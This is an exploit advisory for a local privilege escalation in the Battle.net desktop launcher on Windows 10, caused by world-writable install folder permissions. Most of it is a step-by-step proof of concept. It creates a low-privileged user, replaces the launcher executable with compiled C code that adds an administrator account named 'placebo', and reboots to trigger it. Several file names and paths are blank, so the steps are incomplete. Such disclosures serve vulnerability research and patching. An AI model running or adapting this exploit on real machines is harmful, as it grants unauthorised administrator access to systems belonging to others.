# Exploit Title: Battle.Net - Insecure File Permissions  
# Date: 2020-10-09  
# Exploit Author: George Tsimpidas  
# Software Link : ( Battle Net Desktop )  
# Version Patch:  
# Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362  
# Category: local  
Vulnerability Description:  
Battle.Net Launcher ( suffers from an elevation of  
vulnerability which can be used by a simple user that can change the  
executable file  
with a binary of choice. The vulnerability exist due to the improper  
with the 'F' flag (Full) for 'Users' group, making the entire directory  
'' and its files and sub-dirs world-writable.  
## Insecure Folder Permission  
C:\Program Files (x86)>icacls BUILTIN\Users:(OI)(CI)(F)  
## Insecure File Permission  
C:\Program Files (x86)\>icacls "" BUILTIN\Users:(I)(F)  
## Local Privilege Escalation Proof of Concept  
#0. Download & install  
#1. Create low privileged user & change to the user  
## As admin  
C:\>net user lowpriv Password123! /add  
C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"  
User name lowpriv  
Local Group Memberships *Users  
Global Group memberships *None  
#2. Move the Service EXE to a new name  
C:\Program Files (x86)\> whoami  
C:\Program Files (x86)\> move Battle.frey.exe  
1 file(s) moved.  
#3. Create malicious binary on kali linux  
## Add Admin User C Code  
kali# cat addAdmin.c  
int main(void){  
system("net user placebo mypassword /add");  
system("net localgroup Administrators placebo /add");  
WinExec("C:\\Program Files (x86)\\\\Battle.frey.exe>",0);  
return 0;  
## Compile Code  
kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o  
#4. Transfer created '' to the Windows Host  
#5. Move the created '' binary to the 'C:\Program Files  
(x86)\>' Folder  
C:\Program Files (x86)\> move  
C:\Users\lowpriv\Downloads\ .  
#6. Check that exploit admin user doesn't exists  
C:\Program Files (x86)\> net user placebo  
The user name could not be found  
#6. Reboot the Computer  
C:\Program Files (x86)\> shutdown /r  
#7. Login & look at that new Admin  
C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr  
/v "Full"  
User name placebo  
Local Group Memberships *Administrators *Users  
Global Group memberships *None